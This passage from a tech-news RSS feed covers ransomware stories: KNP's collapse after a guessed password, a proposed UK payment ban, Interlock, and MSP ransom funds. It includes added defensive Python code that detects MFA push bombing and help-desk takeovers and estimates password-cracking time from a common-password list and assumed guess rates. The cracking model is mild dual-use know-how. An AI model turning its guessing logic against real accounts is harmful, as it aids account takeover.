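2025-07-29T09:02:02Z alice mfa_push timeout unknown-q4
2025-07-29T09:04:30Z alice mfa_push approved unknown-q4
2025-07-29T09:04:33Z alice signin success unknown-q4
2025-07-29T09:10:00Z bob mfa_push denied laptop-b7
2025-07-29T09:10:30Z bob mfa_push approved laptop-b7
2025-07-29T09:10:32Z bob signin success laptop-b7
2025-07-29T10:00:00Z carol mfa_reset success helpdesk
2025-07-29T10:20:00Z carol signin success unknown-x9
2025-07-29T11:00:00Z dave mfa_reset success helpdesk
2025-07-29T11:05:00Z dave signin success laptop-d2
"""

# Constructed per-user device baseline (assumption): clients seen before this window.
KNOWN_DEVICES = {
    "alice": {"laptop-a1"},
    "bob": {"laptop-b7"},
    "carol": {"laptop-c3"},
    "dave": {"laptop-d2"},
}


def parse_log(text):
    """Parse the whitespace-separated sample format into time-ordered dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, user, event, outcome, client = line.split()
        events.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "user": user, "event": event, "outcome": outcome, "client": client,
        })
    return sorted(events, key=lambda e: e["ts"])


def detect_push_bombing(events, window=timedelta(minutes=10), min_rejections=3):
    """Users who approved an MFA push after at least `min_rejections` denied or
    timed-out pushes inside `window`. Returns (user, approval_time, rejections)."""
    hits = []
    pushes = defaultdict(list)
    for e in events:
        if e["event"] == "mfa_push":
            pushes[e["user"]].append(e)
    for user, seq in pushes.items():
        for i, e in enumerate(seq):
            if e["outcome"] != "approved":
                continue
            rejected = [p for p in seq[:i]
                        if p["outcome"] in ("denied", "timeout")
                        and e["ts"] - p["ts"] <= window]
            if len(rejected) >= min_rejections:
                hits.append((user, e["ts"], len(rejected)))
    return hits


def detect_helpdesk_takeover(events, known_devices, window=timedelta(hours=2)):
    """An MFA reset (the help-desk path the advisory describes) followed within
    `window` by a successful sign-in from a client never seen for that user.
    Returns (user, reset_time, signin_time, client)."""
    hits = []
    for r in events:
        if not (r["event"] == "mfa_reset" and r["outcome"] == "success"):
            continue
        for e in events:
            if (e["user"] == r["user"] and e["event"] == "signin"
                    and e["outcome"] == "success"
                    and r["ts"] <= e["ts"] <= r["ts"] + window
                    and e["client"] not in known_devices.get(e["user"], set())):
                hits.append((r["user"], r["ts"], e["ts"], e["client"]))
    return hits


def run(text=SAMPLE_LOG, known_devices=KNOWN_DEVICES):
    """Run both detections over one log export and return the findings."""
    events = parse_log(text)
    return {
        "push_bombing": detect_push_bombing(events),
        "helpdesk_takeover": detect_helpdesk_takeover(events, known_devices),
    }


if __name__ == "__main__":
    for kind, hits in run().items():
        for hit in hits:
            print(kind, *hit)
```

<p>On the constructed sample, alice is flagged for push bombing (four rejected prompts in the ten minutes before the approval) and carol for a help-desk reset followed by a sign-in from an unseen client; bob's single denial and dave's sign-in from his usual laptop are left alone. Alice's later sign-in from an unknown client is exactly the kind of event the advisory's 'risky login' guidance expects the identity provider itself to surface, so in practice the reset-then-new-device rule should be fed the provider's own risk score rather than only a hand-kept device list.</p>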
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Hackers breached a 158 year old company by guessing an employee password – experts say it’s a ‘pertinent reminder’ of the devastating impact of cyber crime ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/hackers-breached-a-158-year-old-company-by-guessing-an-employee-password-experts-say-its-a-pertinent-reminder-of-the-devastating-impact-of-cyber-crime</link>
                                                                            <description>
                            <![CDATA[ A Panorama documentary exposed hackers' techniques and talked to the teams trying to tackle them ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">Eyma7X3eTPRVZJwCzjCWQR</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/YDWujEWW55Zc2hfESYZWb4-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Mon, 28 Jul 2025 11:47:21 +0000</pubDate>                                                                                                                                <updated>Mon, 28 Jul 2025 11:47:42 +0000</updated>
                                                                                                                                            <category><![CDATA[Security]]></category>
                                                                                                                    <dc:creator><![CDATA[ Emma Woollacott ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/aWfskavxoVSMDy6cDWtYmJ.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/YDWujEWW55Zc2hfESYZWb4-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Ransomware concept image showing computer screen with binary code, with a skull imprinted over code.]]></media:description>                                                            <media:text><![CDATA[Ransomware concept image showing computer screen with binary code, with a skull imprinted over code.]]></media:text>
                                <media:title type="plain"><![CDATA[Ransomware concept image showing computer screen with binary code, with a skull imprinted over code.]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/YDWujEWW55Zc2hfESYZWb4-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>A British transport firm was forced to close after 158 years because of a single easily guessed password.</p>
<p>According to a <a href="https://www.bbc.co.uk/iplayer/episode/m002g7lj/panorama-fighting-cyber-criminals" target="_blank"><u>recent episode</u></a> of BBC's <em>Panorama</em>, Northamptonshire-based KNP - formerly Knights of Old - was hit by a <a href="https://www.itpro.com/security/28084/what-is-ransomware">ransomware</a> demand that it couldn't pay.</p>
<p>The resulting incident saw the company fold, putting 700 people out of work and highlighting the devastating real-world impact of cyber attacks.</p>
<p>The hack was the work of the Akira ransomware group, which gained access by guessing one employee’s weak password. Director Paul Abbott said he hadn't told the employee concerned that it had been their error that led to the firm's closure.</p>
<p>"Would you want to know if it was you?" he said.</p>
<p>The hackers demanded a ransom believed to have been as much as £5 million.</p>
<p>"If you're reading this it means the internal infrastructure of your company is fully or partially dead…Let's keep all the tears and resentment to ourselves and try to build a constructive dialogue," the ransom note read.</p>
<p>KNP’s insurers immediately sent in a cyber crisis team, which found that all of the company’s data had been encrypted and that its <a href="https://www.itpro.com/infrastructure/servers-and-storage/best-business-servers-year">servers</a>, backup, and <a href="https://www.itpro.com/disaster-recovery-dr/30650/why-cloud-should-be-part-of-your-disaster-recovery-strategy">disaster recovery</a> systems had all been locked. Backups and disaster recovery systems that are reachable from the same compromised network get encrypted along with the production data they were meant to restore, which is why offline or immutable copies are the control that decides whether a ransom has to be paid at all. Unable to pay the ransom, the company was forced to call in administrators.</p>
<p>"The resurfacing of the KNP ransomware incident through the BBC Panorama documentary is a pertinent reminder of the devastating real-world consequences of cyber crime - not only in terms of data loss, but in terms of the livelihoods that can be severely affected by a single compromised password," said Anne Cutler, <a href="https://www.itpro.com/security/28133/what-is-cyber-security">cybersecurity</a> expert at Keeper Security.</p>
<p>"That simple breach precipitated the complete collapse of a 158-year-old business, costing hundreds of jobs and leaving lasting damage. What’s especially sobering about this story is not that it was unique in any significant way, but rather, that it was typical."</p>
<h2 id="password-security-still-has-a-long-way-to-go">Password security still has a long way to go</h2>
<p>Password security has been a key battleground for cybersecurity experts in recent years, with research showing chronically lax practices among consumers and enterprises alike.</p>
<p>A <a href="https://www.itpro.com/security/most-passwords-take-a-matter-of-minutes-to-crack-heres-how-you-can-create-strong-hacker-resistant-credentials"><u>study from Kaspersky</u></a> last year, for example, analyzed 193 million compromised passwords available on the dark web, finding that 45% could be guessed by hackers within a minute.</p>
<p>"The destruction of KNP, formerly Knights of Old, is a truly sad cybersecurity tale,” said Tim Ward, CEO and co-founder of Redflags from ThinkCyber.</p>
<p>“But it is also a tale of simple cyber hygiene issues having a critical impact.”</p>
<p>"We have to take the human factor of security more seriously, or we will see more and more of these sad tales,” Ward added.</p>
<p>In a recent government survey, 43% of UK businesses and 30% of charities <a href="https://www.gov.uk/government/statistics/cyber-security-breaches-survey-2025/cyber-security-breaches-survey-2025"><u>reported</u></a> having experienced a cybersecurity breach or attack in the last 12 months - around 612,000 businesses and 61,000 charities in total.</p>
<p>Cutler noted that a common misstep for many organizations is that they assume they wouldn’t be “worthwhile targets” for cyber criminals. The reality is that any target is viable, she added.</p>
<p>“As this Panorama documentary makes clear, ransomware is not just being deployed on major corporations - it’s targeting the resilience of supply chains, service providers, schools, charities, and local employers like KNP."</p>
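<p>As an added example (not from the article, the Panorama programme or Kaspersky's study), the following Python script makes the 'guessed within a minute' figure concrete: it estimates how many guesses a password costs an attacker who tries a common-password list first, undoes the usual mangling (capitalise, append digits or a symbol), and only then falls back to brute force. The wordlist, the mangling rule, the mangling cost and the two guess rates are assumptions made for the example, chosen as orders of magnitude rather than measurements.</p>

```python
import math
import string

# Constructed stand-in for a breached/common-password corpus (assumption). A
# guesser tries entries in this order, so position = number of guesses needed.
COMMON_PASSWORDS = [
    "123456", "password", "qwerty", "welcome1", "letmein",
    "summer2025", "knights", "password1",
]

# Illustrative guess rates (assumptions, orders of magnitude only): a throttled
# login form, and a GPU rig attacking a leaked database of fast unsalted hashes.
ONLINE_GUESSES_PER_SEC = 10.0
OFFLINE_GUESSES_PER_SEC = 1e10
MANGLING_COST = 100  # assumed extra guesses to cover case/suffix mangling rules

ONE_MINUTE = 60
ONE_YEAR = 365 * 86400


def strip_mangling(pw):
    """Undo the commonest mangling: case and a trailing run of digits/symbols."""
    base = pw.lower().rstrip(string.digits + string.punctuation)
    return base or pw.lower()


def keyspace_bits(pw):
    """Naive brute-force keyspace from length and character classes. This
    overestimates passphrases built from dictionary words, so it is only the
    fallback once the wordlist check has failed."""
    alphabet = 0
    if any(c.islower() for c in pw):
        alphabet += 26
    if any(c.isupper() for c in pw):
        alphabet += 26
    if any(c.isdigit() for c in pw):
        alphabet += 10
    if any(c in string.punctuation for c in pw):
        alphabet += len(string.punctuation)
    if any(c.isspace() for c in pw):
        alphabet += 1
    return len(pw) * math.log2(alphabet) if alphabet else 0.0


def expected_guesses(pw):
    """Guesses needed: wordlist position (times the mangling cost if only the
    stripped base matches), otherwise half the brute-force keyspace."""
    for position, candidate in enumerate(COMMON_PASSWORDS, start=1):
        if pw.lower() == candidate:
            return position
        if strip_mangling(pw) == candidate:
            return position * MANGLING_COST
    return 2 ** keyspace_bits(pw) / 2


def assess(pw):
    """Classify on the offline figure, the one that applies once a hash
    database leaks; the online figure shows what throttling alone buys."""
    guesses = expected_guesses(pw)
    offline = guesses / OFFLINE_GUESSES_PER_SEC
    if offline < ONE_MINUTE:
        verdict = "weak"       # the 'under a minute' bracket
    elif offline < ONE_YEAR:
        verdict = "moderate"
    else:
        verdict = "strong"
    return {
        "password": pw,
        "guesses": guesses,
        "online_seconds": guesses / ONLINE_GUESSES_PER_SEC,
        "offline_seconds": offline,
        "verdict": verdict,
    }


if __name__ == "__main__":
    for pw in ("password", "Knights1!", "Xq7#pL2v", "correct horse battery staple"):
        r = assess(pw)
        print(f"{pw!r:34} {r['verdict']:8} offline {r['offline_seconds']:.3g}s "
              f"online {r['online_seconds']:.3g}s")
```

<p>With these assumptions "password" and the mangled "Knights1!" both fall in a fraction of a second offline, an eight-character random mix of all four classes lasts a few days, and a long passphrase is out of reach. The online figure is what a throttled login form buys; it is only a defence while the hash database has not leaked and the attacker is not spraying a few common guesses across every account, which is why a strong-password policy has to be paired with MFA on every remote entry point. In production, screen candidate passwords against a real breached-password corpus, for example the Have I Been Pwned Pwned Passwords range API, rather than a hand-written list.</p>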
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Can the UK ban ransomware payments? ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/ransomware/can-the-uk-ban-ransomware-payments</link>
                                                                            <description>
                            <![CDATA[ Attempts to cut off ransomware group profits could instead harm businesses ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">viEeLUGan7dWG4RE4MQkN7</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/cHmzDg3BHekpRgvDeLcC3e-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Fri, 25 Jul 2025 14:58:04 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Ransomware]]></category>
                                                    <category><![CDATA[Security]]></category>
                                                                                                <author><![CDATA[ rory.bathgate@futurenet.com (Rory Bathgate) ]]></author>                    <dc:creator><![CDATA[ Rory Bathgate ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/LFPWMoCGDVHowHbMpHJZkU.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/cHmzDg3BHekpRgvDeLcC3e-1280-80.jpg">
                                                            <media:credit><![CDATA[Future]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[The text &quot;Can the UK ban ransomware payments?&quot; against an abstract background of a red circle on a blue gradient. The words &quot;ransomware payments&quot; are in yellow, the rest are in white. In the bottom-right corner, the ITPro podcast is shown.]]></media:description>                                                            <media:text><![CDATA[The text &quot;Can the UK ban ransomware payments?&quot; against an abstract background of a red circle on a blue gradient. The words &quot;ransomware payments&quot; are in yellow, the rest are in white. In the bottom-right corner, the ITPro podcast is shown.]]></media:text>
                                <media:title type="plain"><![CDATA[The text &quot;Can the UK ban ransomware payments?&quot; against an abstract background of a red circle on a blue gradient. The words &quot;ransomware payments&quot; are in yellow, the rest are in white. In the bottom-right corner, the ITPro podcast is shown.]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/cHmzDg3BHekpRgvDeLcC3e-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <iframe allow="" height="200px" width="100%" id="" style="" data-lazy-priority="low" data-lazy-src="https://player.captivate.fm/episode/3112569a-cd0b-4887-8b63-0043edee8a31/"></iframe>
<p>Ransomware payments could soon be a thing of the past in the UK – at least that’s the hope behind new controls and mandatory reporting requirements intended to stop ransomware from inflicting damage on UK businesses.</p>
<p>Under government proposals, public bodies and operators of critical national infrastructure would be banned from paying up when they’re hit by ransomware – and other businesses would have to be transparent when they decide to cough up the cash.</p>
<p>But can we really put a lid on ransomware? And might the new rules have unintended negative consequences?</p>
<p>In this episode, Jane and Rory discuss the UK government’s new ransomware payment ban and what it could mean for the sector.</p>
<h2 id="highlights">Highlights</h2>
<p>"You can see why ransomware is such a lucrative operation for these threat groups, because for some businesses, there's very little argument. You know, 'okay, we plan for this, here's the cash, can we have our data back?' It's a pretty seamless operation."</p>
<p>"There's been a mixed response from the cybersecurity industry. So some have praised it as a bit of a no-brainer, others have warned that it really doesn't do very much to defend businesses, as we've been discussing. Jonathan Wright, who is a partner in the UK data privacy and cybersecurity practice at Hunton Andrews Kurth LLP law firm, said that the ban risks punishing the victims."</p>
<p>"We are always covering cases of ransomware causing serious damage to businesses and we recently, in fact, published a piece that said that cyber attacks cost UK businesses alone £64 billion a year. That's including ransom payments, but also staff overtime, lost business and all the other associated costs. So it's clear that it has a major impact on the economy."</p>
<h2 id="footnotes">Footnotes</h2><ul><li><a href="https://www.itpro.com/security/ransomware/nearly-half-of-msps-admit-to-having-a-ransomware-kitty" target="_blank"><u>Nearly half of MSPs admit to having a ransomware kitty</u></a></li><li><a href="https://www.itpro.com/security/ransomware/a-ransomware-payments-ban-risks-criminalizing-victims" target="_blank"><u>A ransomware payments ban risks criminalizing victims</u></a></li><li><a href="https://www.itpro.com/security/ransomware/the-end-of-ransomware-payments-how-businesses-fit-into-the-fight" target="_blank"><u>The end of ransomware payments: How businesses fit into the fight</u></a></li><li><a href="https://www.itpro.com/security/ransomware/building-ransomware-resilience-to-avoid-paying-out" target="_blank"><u>Building ransomware resilience to avoid paying out</u></a></li><li><a href="https://www.itpro.com/security/ransomware/Uk-government-ransomware-payment-ban" target="_blank"><u>UK government officials consider banning ransomware payments</u></a></li></ul>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Interlock ransomware gang is ramping up activity, CISA warns ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/ransomware/interlock-ransomware-gang-is-ramping-up-activity-cisa-warns</link>
                                                                            <description>
                            <![CDATA[ The threat group, which uses a double-extortion technique, has been attacking organizations across North America and Europe ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">KdKWbNZrAK3zEUkxGAji3V</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/iYfDDDfVYNFEDBMdcZc62A-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Wed, 23 Jul 2025 12:34:49 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Ransomware]]></category>
                                                    <category><![CDATA[Security]]></category>
                                                                                                                    <dc:creator><![CDATA[ Emma Woollacott ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/aWfskavxoVSMDy6cDWtYmJ.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/iYfDDDfVYNFEDBMdcZc62A-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[A glowing blue padlock with coiled red CGI data around it, representing new ransomware.]]></media:description>                                                            <media:text><![CDATA[A glowing blue padlock with coiled red CGI data around it, representing new ransomware.]]></media:text>
                                <media:title type="plain"><![CDATA[A glowing blue padlock with coiled red CGI data around it, representing new ransomware.]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/iYfDDDfVYNFEDBMdcZc62A-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>The Interlock ransomware gang is aggressively targeting businesses and critical infrastructure in North America and Europe, according to a new warning from the US <a href="https://www.itpro.com/security/what-is-cisa">Cybersecurity and Infrastructure Security Agency (CISA)</a>, which says the group is stepping up its attacks and changing tactics.</p><p>The agency issued an <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a" target="_blank"><u>advisory</u></a> describing how Interlock picks its victims on the basis of opportunity, carrying out financially motivated attacks based on vectors such as <a href="https://www.itpro.com/security/phishing/why-social-engineering-is-such-a-problem-and-how-your-business-can-protect-itself">social engineering</a>.</p><p>The group's ransomware encryptors work with both Windows and Linux operating systems, and have been spotted encrypting virtual machines (VMs) across both. So far, says CISA, the group has been leaving hosts, workstations, and physical servers unaffected – but this could change in future.</p><p>The group uses a broad range of tactics to gain access.</p><p>"FBI observed actors obtaining initial access via drive-by download from compromised legitimate websites, which is an uncommon method among ransomware groups," CISA said.</p><p>Interlock then uses a range of different methods for discovery, credential access, and lateral movement to spread to other systems on the network, before issuing ransom demands. 
</p><p>The group uses a <a href="https://www.itpro.com/security/ransomware/367624/the-rise-of-double-extortion-ransomware">double extortion</a> model, encrypting systems after exfiltrating data, to increase the pressure on victims.</p><p>It recently claimed responsibility for <a href="https://www.itpro.com/security/cyber-attacks/us-healthcare-firm-postponed-procedures-after-cyber-attack-knocked-systems-offline"><u>an attack on US healthcare provider Kettering Health</u></a> that caused a company-wide outage, with other victims including kidney care provider DaVita and the UK's West Lothian Council.</p><p>The group has carried out 16 confirmed attacks to date per <a href="https://www.comparitech.com/blog/information-security/global-ransomware-attacks/" target="_blank"><u>Comparitech data</u></a> and an additional 17 unconfirmed attacks since last October.</p><p>"What sets Interlock apart is its tactical diversity," commented Nick Tausek, lead security automation architect at Swimlane. </p><p>"The group has used <a href="https://www.itpro.com/security/clickfix-social-engineering-state-sponsored-hackers">ClickFix attacks</a> to impersonate IT tools and infiltrate networks, deployed <a href="https://www.itpro.com/security/malware/neptune-rat-malware-growth">remote access trojans (RATs)</a> to deliver malware, and most recently, adopted double extortion tactics to maximize pressure on victims."</p><p>CISA recommended that organizations should prevent initial access by implementing domain name system filtering and web access firewalls, and by training users to spot social engineering attempts.  </p><p>Leaders should deal with known vulnerabilities by ensuring operating systems, software, and firmware <a href="https://www.itpro.com/security/patch-management-why-firms-ignore-vulnerabilities-at-their-own-risk">are patched and up to date</a>, and segment networks to restrict lateral movement.  
</p><p>And they should <a href="https://www.itpro.com/security/how-to-implement-identity-and-access-management-iam-effectively-in-your-business">implement identity, credential, and access management policies</a> across the organization, requiring <a href="https://www.itpro.com/security/29982/what-is-two-factor-authentication">multi-factor authentication</a> wherever possible.</p><p>"The range and frequency of these attacks highlight just how adaptable modern threat actors have become. Attacks now come from multiple vectors, often at once, and organizations must be ready," said Tausek.</p><p>"Regular patching, network segmentation, and proactive defenses are essential. Just as critical is equipping employees with the awareness to recognize social engineering attempts before they lead to compromise."</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Nearly half of MSPs admit to having a ransomware kitty ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/ransomware/nearly-half-of-msps-admit-to-having-a-ransomware-kitty</link>
                                                                            <description>
                            <![CDATA[ The firm’s annual MSP report highlights the mounting pressure on MSPs as attackers increasingly leverage the latest AI advancements ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">L2GvZCr5yXz6Mm8XRV6zC6</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/LrXBU2G7X45b6NeaQsxQsN-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Wed, 23 Jul 2025 07:00:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Ransomware]]></category>
                                                    <category><![CDATA[Security]]></category>
                                                                                                <author><![CDATA[ itpro@futurenet.com (Daniel Todd) ]]></author>                    <dc:creator><![CDATA[ Daniel Todd ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/SRyC34qeLpNDj3dJtsVDhT.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/LrXBU2G7X45b6NeaQsxQsN-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Ransomware concept image showing a warning symbol in red with binary code in background.]]></media:description>                                                            <media:text><![CDATA[Ransomware concept image showing a warning symbol in red with binary code in background.]]></media:text>
                                <media:title type="plain"><![CDATA[Ransomware concept image showing a warning symbol in red with binary code in background.]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/LrXBU2G7X45b6NeaQsxQsN-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>Nearly half (45%) of MSPs maintain a dedicated pool of money for paying ransomware demands, according to new research from Cybersmart.</p><p>Conducted in collaboration with OnePoll, the firm’s annual <a href="https://www.itpro.com/business/business-strategy/manageengine-debuts-new-msp-platform-to-streamline-it-operations">MSP</a> Survey report dives into the security of MSPs and their customers, detailing responses from 900 MSPs located across the UK, Europe, Australia, and New Zealand.</p><p>The study revealed that many MSPs would rather prepare for the worst-case scenario of paying a ransom than follow the advice of insurers and global governments to focus on proactive prevention.</p><p>Guidance and best practice around ransomware payments have typically been inadequately defined across the industry. Earlier this year, the <a href="https://www.itpro.com/security/ransomware/Uk-government-ransomware-payment-ban">UK Government proposed a targeted ban on ransomware payments</a> for public sector bodies and critical national infrastructure (CNI) in a bid to make things clearer.</p><p>Despite this, Cybersmart’s findings show that MSPs are suffering from the effects of a lack of clarity across the board, with uncertainty also likely to filter down to their SME clients and into the wider ecosystem.</p><p>While 45% rely on a ransomware fund in their battle against <a href="https://www.itpro.com/security/28084/what-is-ransomware">ransomware</a>, 36% of respondents said they choose to protect themselves through <a href="https://www.itpro.com/security/cyber-security/368458/what-is-cyber-insurance">cyber insurance</a>.</p><p>Perhaps most concerning, however, is that a staggering 11% of participants admitted to having no ransomware-focused budget or cyber insurance at all, drastically increasing the likelihood of critical financial and reputational consequences.</p><h2 id="concerns">Concerns</h2><p>As AI continues to expand its influence 
across industries at breakneck speed, the survey found the technology to be the number one concern for MSPs for 2025 (44%), with ransomware and malware in second place (40%). </p><p>That’s in stark contrast to last year’s iteration of the report, with AI nowhere to be found on its list of top concerns.</p><p>Attackers are now increasingly leveraging AI advancements to generate phishing emails, produce convincing deepfakes, as well as create advanced malware in order to dupe organizations.</p><p>In fact, 2024 saw 67% of MSPs report an AI-based attack, with Cybersmart reasoning that 2025 will likely see this figure increase as attackers continue to leverage the latest generative AI, agentic AI, and deepfake technology.</p><p>This challenge is compounded by a lack of easy-to-use tools for MSPs to counter attacks, leaving SME clients vulnerable at a time when many are looking for increased support against <a href="https://www.itpro.com/strategy/28181/what-is-ai">AI</a>.</p><p>According to the data, 84% of MSP participants said their customers now expect them to manage either their cyber security infrastructure, or their cyber security and IT estate combined.</p><p>“With customers <a href="https://www.itpro.com/security/msps-emerge-as-key-security-partners-for-mid-market-enterprises">relying more on MSPs for cybersecurity</a>, it is essential that MSPs are cyber secure and cyber confident themselves, which means tackling the evolving threat landscape head-on,” explained Jamie Akhtar, Cybersmart’s CEO and co-founder. 
</p><p>“Organizations shouldn’t rely on ransomware payments; rather, they should partner with organizations that can help proactively secure them.”</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
            </channel>
</rss>